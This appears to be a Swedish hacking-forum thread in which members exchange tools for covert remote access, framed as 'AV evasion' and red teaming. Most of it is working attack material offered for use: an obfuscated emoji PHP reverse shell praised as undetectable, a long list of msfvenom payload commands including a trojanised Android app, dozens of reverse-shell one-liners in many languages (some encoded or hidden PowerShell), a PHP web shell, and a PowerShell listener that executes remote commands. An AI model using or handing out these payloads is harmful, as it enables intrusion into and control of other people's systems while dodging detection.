• 1
  • 2
2022-12-03, 01:07
  #1
Medlem
0xgh64s avatar
Tjo, behöver en reverse http listener (eller https). Någon som skrivit en eller vet om det finns någon på github? Osäker om netcat/socat eller msfs multi handler supportar reverse http, haha metasploit. Skulle dock faktiskt vara till nytta om man kan byta mellan sessions om det nu inte bara är för meterpreters.. Och sen netcat har ju sina små problem med fall man trycker lite fel och det tar det som input. Därav jag tänkte på socat. Ska gärna kunna fånga flera incoming connections och ha background sessions.
__________________
Senast redigerad av 0xgh64 2022-12-03 kl. 01:36.
Citera
2022-12-03, 01:10
  #2
Medlem
Bromsklosss avatar
Citat:
Ursprungligen postat av 0xgh64
reverse http listener


Vad menas med det?
Citera
2022-12-03, 01:12
  #3
Medlem
0xgh64s avatar
Citat:
Ursprungligen postat av Bromskloss
Vad menas med det?
En reverse connection listener över http istället för tcp.
Citera
2022-12-04, 20:41
  #4
Medlem
0xgh64s avatar
Redigerar mig lite pratade inte om socat utan pwncat**
Citera
2022-12-09, 10:25
  #5
Bannlyst
Citat:
Ursprungligen postat av 0xgh64
Tjo, behöver en reverse http listener (eller https). Någon som skrivit en eller vet om det finns någon på github? Osäker om netcat/socat eller msfs multi handler supportar reverse http, haha metasploit. Skulle dock faktiskt vara till nytta om man kan byta mellan sessions om det nu inte bara är för meterpreters.. Och sen netcat har ju sina små problem med fall man trycker lite fel och det tar det som input. Därav jag tänkte på socat. Ska gärna kunna fånga flera incoming connections och ha background sessions.

Kan du visa ett exempel på hur du skulle kunna göra detta med netcat?
Citera
2022-12-09, 13:44
  #6
Medlem
0xgh64s avatar
Citat:
Ursprungligen postat av V50-o-vhe
Kan du visa ett exempel på hur du skulle kunna göra detta med netcat?
Netcat lyssnar endast via UDP/TCP, behöver HTTP för AV evasion (red teaming, för er som undrar). Därav jag funderaded på pwncat-cs/msf. Vet att jag tidigare skrev om en exploit i metasploit som redirectade HTTP trafiken vidare till netcat i en SSRF som jag escelerade till RCE, om jag inte minns helt fel. Men med närmare eftertanke så fick jag det att fungera också med nc (OpenBSD versionen av netcat) som har support för ex proxies och ipv6 bland annat, att direkt med en python redirect server redirecta HTTP requesten istället för att redirecta via msf. Kommer inte ihåg riktigt vad som var så speciellt med just den SSRF:n. Oavsett har jag en lösning på nuvarande problemet. Men om du undrade hur man lyssnar för inkommande trafik på en port med netcat? Så , nc -lvnp [port] och så måste du ju ha porten öppen i din firewall på routern (port forwarding).
Citat:
Ursprungligen postat av V50-o-vhe
Softronic Akopplingar till Softronic Baltic AS, Estland?

Tvättar dom pengar via bolagen.

Varför har Softronic Baltic AS lagt ner i Estland?

Vet ni ingenting i Sverige om vad ni anlitar för företag? Kan ni bara skylla ifrån er på Ryssland för att ni inte kan vakna ifrån en koma ni har varit i sedan 1998?

Vad vet ni om Softronic Baltic AS och Softronic AB, Film Institutet m.m som Softronic har avtal med?

www.sfi.se och www.filmarkivet.se är båda byggda på CMS-plattformen EPiServer.

Vet ni ingenting om vad ni anlitar för företag och vad dom kan?

Softronic har även ett försäkringsbolag Softronic Insurance Technology Management (ITM).
Fel tråd?
Citera
2022-12-09, 14:13
  #7
Bannlyst
Citat:
Ursprungligen postat av 0xgh64
Netcat lyssnar endast via UDP/TCP, behöver HTTP för AV evasion (red teaming, för er som undrar). Därav jag funderaded på pwncat-cs/msf. Vet att jag tidigare skrev om en exploit i metasploit som redirectade HTTP trafiken vidare till netcat i en SSRF som jag escelerade till RCE, om jag inte minns helt fel. Men med närmare eftertanke så fick jag det att fungera också med nc (OpenBSD versionen av netcat) som har support för ex proxies och ipv6 bland annat, att direkt med en python redirect server redirecta HTTP requesten istället för att redirecta via msf. Kommer inte ihåg riktigt vad som var så speciellt med just den SSRF:n. Oavsett har jag en lösning på nuvarande problemet. Men om du undrade hur man lyssnar för inkommande trafik på en port med netcat? Så , nc -lvnp [port] och så måste du ju ha porten öppen i din firewall på routern (port forwarding).

Fel tråd?

Fel tråd ja.

Ja, då förstår jag vad du menade med netcat. Hur blev lösningen du gjorde då, om du vill visa?
Citera
2022-12-09, 14:25
  #8
Medlem
0xgh64s avatar
Citat:
Ursprungligen postat av V50-o-vhe
Fel tråd ja.

Ja, då förstår jag vad du menade med netcat. Hur blev lösningen du gjorde då, om du vill visa?
Kan lägga några snippets ungefär hur den kommer att bli byggd när jag är vid datorn.
Citera
2022-12-09, 15:45
  #9
Bannlyst
Citat:
Ursprungligen postat av 0xgh64
Kan lägga några snippets ungefär hur den kommer att bli byggd när jag är vid datorn.

Ja okej. Varför jag frågar dig det är för att jag inte vet vad du önskar att nå för mål. Vill du att det skall reversa ett shell när någon går in på en http länk som du delar till personen?

Isåfall finns det flera olika vis och beroende på språk du tänk använda så blir det ju olika uppsättningar.

Här är min favorit, emoji hacket kallar jag det.

Kod:
php -r '$😀="1";$ðŸ˜="2";$😅="3";$😆="4";$😉="5";$😊="6";$😎="7";$ðŸ˜="8";$😚="9";$🙂="0";$🤢=" ";$🤓="<";$🤠=">";$😱="-";$😵="&";$🤩="i";$🤔=".";$🤨="/";$🥰="a";$ðŸ˜="b";$😶="i";$🙄="h";$😂="c";$🤣="d";$😃="e";$😄="f";$😋="k";$😘="n";$😗="o";$😙="p";$🤗="s";$😑="x";$💀 = $😄. $🤗. $😗. $😂. $😋. $😗. $😙. $😃. $😘;$🚀 = "ip-address";$💻 = port;$🚠= "sh". $🤢. $😱. $🤩. $🤢. $🤓. $😵. $😅. $🤢. $🤠. $😵. $😅. $🤢. $ðŸ˜. $🤠. $😵. $😅;$🤣 =  $💀($🚀,$💻);$👽 = $😃. $😑. $😃. $😂;$👽($ðŸš);'

Den tar ingen forensiker i hela världen.
__________________
Senast redigerad av V50-o-vhe 2022-12-09 kl. 15:47.
Citera
2022-12-09, 15:51
  #10
Bannlyst
Metasploit.

Kod:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f exe -o reverse.exe

Windows Meterpreter Staged Reverse TCP (x64)

Kod:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f exe -o reverse.exe

Windows Staged Reverse TCP (x64)

Kod:
msfvenom -p windows/x64/shell/reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f exe -o reverse.exe

Linux Meterpreter Staged Reverse TCP (x64)

Kod:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f elf -o reverse.elf


Linux Stageless Reverse TCP (x64)

Kod:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f elf -o reverse.elf

Windows Bind TCP ShellCode - BOF

Kod:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f elf -o reverse.elf

Windows Bind TCP ShellCode - BOF

Kod:
msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '' -f python -v notBuf -o shellcode

macOS Meterpreter Staged Reverse TCP (x64)

Kod:
msfvenom -p osx/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f macho -o shell.macho

macOS Stageless Reverse TCP (x64)

Kod:
msfvenom -p osx/x64/shell_reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f macho -o shell.macho

PHP Meterpreter Stageless Reverse TCP

Kod:
msfvenom -p php/meterpreter_reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f raw -o shell.php


PHP Reverse PHP

Kod:
msfvenom -p php/reverse_php LHOST=xx.xx.xx.x LPORT=xxxx -o shell.php



JSP Stageless Reverse TCP

Kod:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f raw -o shell.jsp

WAR Stageless Reverse TCP

Kod:
msfvenom -p java/shell_reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f war -o shell.war


Android Meterpreter Reverse TCP

Kod:
msfvenom --platform android -p android/meterpreter/reverse_tcp lhost=xx.xx.xx.x lport=xxxx R -o malicious.apk

Android Meterpreter Embed Reverse TCP

Kod:
msfvenom --platform android -x template-app.apk -p android/meterpreter/reverse_tcp lhost=xx.xx.xx.x lport=xxxx -o payload.apk

Python Stageless Reverse TCP

Kod:
msfvenom -p cmd/unix/reverse_python LHOST=xx.xx.xx.x LPORT=xxxx -f raw


Bash Stageless Reverse TCP

Kod:
msfvenom -p cmd/unix/reverse_bash LHOST=xx.xx.xx.x LPORT=xxxx -f raw -o shell.sh
Citera
2022-12-09, 15:52
  #11
Bannlyst
BASH 5

Kod:
sh -i 5<> /dev/tcp/xx.xx.xx.xx/9001 0<&5 1>&5 2>&5

BASH READLINE

Kod:
exec 5<>/dev/tcp/xx.xx.xx.xx/9001;cat <&5 | while read line; do $line 2>&5 >&5; done


BASH 196

Kod:
0<&196;exec 196<>/dev/tcp/xx.xx.xx.xx/9001; sh <&196 >&196 2>&196


BASH -i

Kod:
sh -i >& /dev/tcp/xx.xx.xx.xx/9001 0>&1



AWK

Kod:
awk 'BEGIN {s = "/inet/tcp/0/xx.xx.xx.xx/9001"; 
while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

VLANG

Kod:
echo 'import os' > /tmp/t.v && echo 'fn main() { os.system("nc -e sh xx.xx.xx.xx 9001 0>&1") }' >> /tmp/t.v && v run /tmp/t.v && rm /tmp/t.v

GOLANG

Kod:
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","xx.xx.xx.xx:9001");cmd:=exec.Command("sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go


LUA - Method 1

Kod:
lua5.1 -e 'local host, port = "xx.xx.xx.xx", 9001 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'

LUA - Metod 2

Kod:
lua -e "require('socket');require('os');t=socket.tcp();t:connect('xx.xx.xx.xx','9001');os.execute('sh -i <&3 >&3 2>&3');"


ZSH

Kod:
zsh -c 'zmodload zsh/net/tcp && ztcp xx.xx.xx.xx 9001 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'

TELNET

Kod:
TF=$(mktemp -u);mkfifo $TF && telnet xx.xx.xx.xx 9001 0<$TF | sh 1>$TF

GROOVY

Kod:
String host="xx.xx.xx.xx";int port=9001;String cmd="sh";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

JAVASCRIPT

Kod:
String command = "var host = 'xx.xx.xx.xx';" +
                       "var port = 9001;" +
                       "var cmd = 'sh';"+
                       "var s = new java.net.Socket(host, port);" +
                       "var p = new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();"+
                       "var pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();"+
                       "var po = p.getOutputStream(), so = s.getOutputStream();"+
                       "print ('Connected');"+
                       "while (!s.isClosed()) {"+
                       "    while (pi.available() > 0)"+
                       "        so.write(pi.read());"+
                       "    while (pe.available() > 0)"+
                       "        so.write(pe.read());"+
                       "    while (si.available() > 0)"+
                       "        po.write(si.read());"+
                       "    so.flush();"+
                       "    po.flush();"+
                       "    java.lang.Thread.sleep(50);"+
                       "    try {"+
                       "        p.exitValue();"+
                       "        break;"+
                       "    }"+
                       "    catch (e) {"+
                       "    }"+
                       "}"+
                       "p.destroy();"+
                       "s.close();";
String x = "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\""+command+"\")";
ref.add(new StringRefAddr("x", x);



PYTHON MINIMAL

Kod:
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("xx.xx.xx.xx",9001));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'
'


PYTHON

Kod:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("xx.xx.xx.xx",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'



Kod:
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0  AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQAwAC4AMQAwACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUA  YQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABl  AHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0A  LgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAw  ACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQA  ZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABl  AHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAA  fAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAg  ACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUA  IAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAk  AHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwA  JABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBs  AGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==
POWERSHELL

Kod:
powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('xx.xx.xx.xx', 9001);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"

PHP proc_open

Kod:
php -r '$sock=fsockopen("xx.xx.xx.xx",9001);$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'

PHP popen

Kod:
php -r '$sock=fsockopen("xx.xx.xx.xx",9001);popen("sh <&3 >&3 2>&3", "r");'

PHP

Kod:
php -r '$sock=fsockopen("xx.xx.xx.xx",9001);`sh <&3 >&3 2>&3`;'

PHP passtrhu

Kod:
php -r '$sock=fsockopen("xx.xx.xx.xx",9001);passthru("sh <&3 >&3 2>&3");'

PHP system

Kod:
php -r '$sock=fsockopen("xx.xx.xx.xx",9001);system("sh <&3 >&3 2>&3");'

PHP shell_exec

Kod:
php -r '$sock=fsockopen("xx.xx.xx.xx",9001);shell_exec("sh <&3 >&3 2>&3");'


PHP exec

Kod:
php -r '$sock=fsockopen("xx.xx.xx.xx",9001);exec("sh <&3 >&3 2>&3");'

PHP cmd

Kod:
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>

Källa: Svensk Hackare

Stort stort lycka till.
__________________
Senast redigerad av V50-o-vhe 2022-12-09 kl. 15:54.
Citera
2022-12-10, 00:54
  #12
Medlem
0xgh64s avatar
Citat:
Ursprungligen postat av V50-o-vhe
Ja okej. Varför jag frågar dig det är för att jag inte vet vad du önskar att nå för mål. Vill du att det skall reversa ett shell när någon går in på en http länk som du delar till personen?

Isåfall finns det flera olika vis och beroende på språk du tänk använda så blir det ju olika uppsättningar.

Här är min favorit, emoji hacket kallar jag det.

Kod:
php -r '$😀="1";$ðŸ˜="2";$😅="3";$😆="4";$😉="5";$😊="6";$😎="7";$ðŸ˜="8";$😚="9";$🙂="0";$🤢=" ";$🤓="<";$🤠=">";$😱="-";$😵="&";$🤩="i";$🤔=".";$🤨="/";$🥰="a";$ðŸ˜="b";$😶="i";$🙄="h";$😂="c";$🤣="d";$😃="e";$😄="f";$😋="k";$😘="n";$😗="o";$😙="p";$🤗="s";$😑="x";$💀 = $😄. $🤗. $😗. $😂. $😋. $😗. $😙. $😃. $😘;$🚀 = "ip-address";$💻 = port;$🚠= "sh". $🤢. $😱. $🤩. $🤢. $🤓. $😵. $😅. $🤢. $🤠. $😵. $😅. $🤢. $ðŸ˜. $🤠. $😵. $😅;$🤣 =  $💀($🚀,$💻);$👽 = $😃. $😑. $😃. $😂;$👽($ðŸš);'

Den tar ingen forensiker i hela världen.

Nej en listener som lyssnar efter HTTP connections på port 80 och öppnar ett pseudo shell på port 80. Vad är den där encodade/encryptade PHP koden?
Edit: Nvm läste att det var emoji rev shellet, hashen är nog delad bland AV providers.

Citat:
Ursprungligen postat av V50-o-vhe
Metasploit.

Kod:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f exe -o reverse.exe

Windows Meterpreter Staged Reverse TCP (x64)

Kod:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f exe -o reverse.exe

Windows Staged Reverse TCP (x64)

Kod:
msfvenom -p windows/x64/shell/reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f exe -o reverse.exe

Linux Meterpreter Staged Reverse TCP (x64)

Kod:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f elf -o reverse.elf


Linux Stageless Reverse TCP (x64)

Kod:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f elf -o reverse.elf

Windows Bind TCP ShellCode - BOF

Kod:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f elf -o reverse.elf

Windows Bind TCP ShellCode - BOF

Kod:
msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '' -f python -v notBuf -o shellcode

macOS Meterpreter Staged Reverse TCP (x64)

Kod:
msfvenom -p osx/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f macho -o shell.macho
--SNIPET--

Msfvenom är inget att rekomendera pågrund av AV detection. Bäst är att fixa sin egen shellcode. Orsaken min connection kommer gå över HTTP är just för AV evasion.

Citat:
Ursprungligen postat av V50-o-vhe
BASH 5

Kod:
sh -i 5<> /dev/tcp/xx.xx.xx.xx/9001 0<&5 1>&5 2>&5

BASH READLINE

Kod:
exec 5<>/dev/tcp/xx.xx.xx.xx/9001;cat <&5 | while read line; do $line 2>&5 >&5; done


BASH 196

Kod:
0<&196;exec 196<>/dev/tcp/xx.xx.xx.xx/9001; sh <&196 >&196 2>&196


BASH -i

Kod:
sh -i >& /dev/tcp/xx.xx.xx.xx/9001 0>&1



AWK

Kod:
awk 'BEGIN {s = "/inet/tcp/0/xx.xx.xx.xx/9001"; 
while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

VLANG

Kod:
echo 'import os' > /tmp/t.v && echo 'fn main() { os.system("nc -e sh xx.xx.xx.xx 9001 0>&1") }' >> /tmp/t.v && v run /tmp/t.v && rm /tmp/t.v

GOLANG

Kod:
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","xx.xx.xx.xx:9001");cmd:=exec.Command("sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go


LUA - Method 1

Kod:
lua5.1 -e 'local host, port = "xx.xx.xx.xx", 9001 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'

LUA - Metod 2

Kod:
lua -e "require('socket');require('os');t=socket.tcp();t:connect('xx.xx.xx.xx','9001');os.execute('sh -i <&3 >&3 2>&3');"


ZSH

Kod:
zsh -c 'zmodload zsh/net/tcp && ztcp xx.xx.xx.xx 9001 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'

TELNET

Kod:
TF=$(mktemp -u);mkfifo $TF && telnet xx.xx.xx.xx 9001 0<$TF | sh 1>$TF

GROOVY

Kod:
String host="xx.xx.xx.xx";int port=9001;String cmd="sh";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

JAVASCRIPT

Kod:
String command = "var host = 'xx.xx.xx.xx';" +
                       "var port = 9001;" +
                       "var cmd = 'sh';"+
                       "var s = new java.net.Socket(host, port);" +
                       "var p = new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();"+
                       "var pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();"+
                       "var po = p.getOutputStream(), so = s.getOutputStream();"+
                       "print ('Connected');"+
                       "while (!s.isClosed()) {"+
                       "    while (pi.available() > 0)"+
                       "        so.write(pi.read());"+
                       "    while (pe.available() > 0)"+
                       "        so.write(pe.read());"+
                       "    while (si.available() > 0)"+
                       "        po.write(si.read());"+
                       "    so.flush();"+
                       "    po.flush();"+
                       "    java.lang.Thread.sleep(50);"+
                       "    try {"+
                       "        p.exitValue();"+
                       "        break;"+
                       "    }"+
                       "    catch (e) {"+
                       "    }"+
                       "}"+
                       "p.destroy();"+
                       "s.close();";
String x = "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\""+command+"\")";
ref.add(new StringRefAddr("x", x);



PYTHON MINIMAL

Kod:
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("xx.xx.xx.xx",9001));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'

--SNIPET--

Källa: Svensk Hackare

Stort stort lycka till.

Detta är endast simpla reverse shells som man kan generera på ex revshellgen, bra med ex en bash one liner om man har server-side injection och vill sätta upp ett reverse shell på en webapp. Själva payloaden är FUD och staged som fetchar själva egentliga payloaden och AMSI + UAC bypasses från en annan server. Har du mycket erfarenhet? Inom vilket område? Lägg till mig på IG 0xgh64. Kan lägga med dig med en hel del erfarna hackers.

Här är ungefär vad jag var ute efter:
Kod:
$listener = New-Object System.Net.Sockets.TcpListener 80
$listener.Start()

while ($true) {
  $client = $listener.AcceptTcpClient()
  $stream = $client.GetStream()
  $reader = New-Object System.IO.StreamReader $stream
  $writer = New-Object System.IO.StreamWriter $stream

  $prompt = "PS > "
  $writer.WriteLine("Pseudo Shell")
  $writer.WriteLine("")
  $writer.Write($prompt)
  $writer.Flush()

  while ($line = $reader.ReadLine()) {
    if ($line -eq "exit") {
      $writer.WriteLine("Exiting shell")
      break
    }

    $output = Invoke-Expression $line

    $writer.WriteLine($output)
    $writer.Write($prompt)
    $writer.Flush()
  }

  $client.Close()
}

Upload module:
Kod:
  while ($line = $reader.ReadLine()) {
    if ($line -match "^upload") {
      $filename = $line.Split(" ")[1]
      $writer.WriteLine("Uploading $filename")

      $contents = $reader.ReadToEnd()

      $file = [System.IO.Path]::Combine
__________________
Senast redigerad av 0xgh64 2022-12-10 kl. 01:06.
Citera
  • 1
  • 2

Skapa ett konto eller logga in för att kommentera

Du måste vara medlem för att kunna kommentera

Skapa ett konto

Det är enkelt att registrera ett nytt konto

Bli medlem

Logga in

Har du redan ett konto? Logga in här

Logga in